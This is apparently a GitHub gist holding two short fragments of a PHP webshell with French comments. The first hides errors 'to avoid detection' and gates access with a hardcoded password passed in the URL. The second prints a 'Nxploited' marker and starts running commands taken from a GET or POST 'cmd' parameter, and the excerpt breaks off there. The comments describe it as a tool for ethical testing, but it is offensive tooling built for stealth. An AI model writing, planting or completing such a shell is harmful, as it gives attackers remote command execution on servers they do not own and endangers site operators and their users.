This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Webshell simple pour tests éthiques - NE PAS UTILISER SUR DES SITES TIERS | |
| error_reporting(0); // Cache les erreurs pour éviter la détection | |
| // Vérification basique (optionnel : remplace 'secret' par un mot de passe pour sécuriser) | |
| $password = 'secret'; // Change ça ! | |
| if (!isset($_GET['pass']) || $_GET['pass'] !== $password) { | |
| die('Accès refusé'); | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| // Webshell pour tests - À utiliser UNIQUEMENT sur vos propres sites | |
| error_reporting(0); | |
| // Marqueur pour la détection automatique | |
| echo "<b>Nxploited</b>"; | |
| // Exécution de commandes via GET ou POST | |
| if (isset($_GET['cmd'])) { | |
| echo "<pre>\n"; |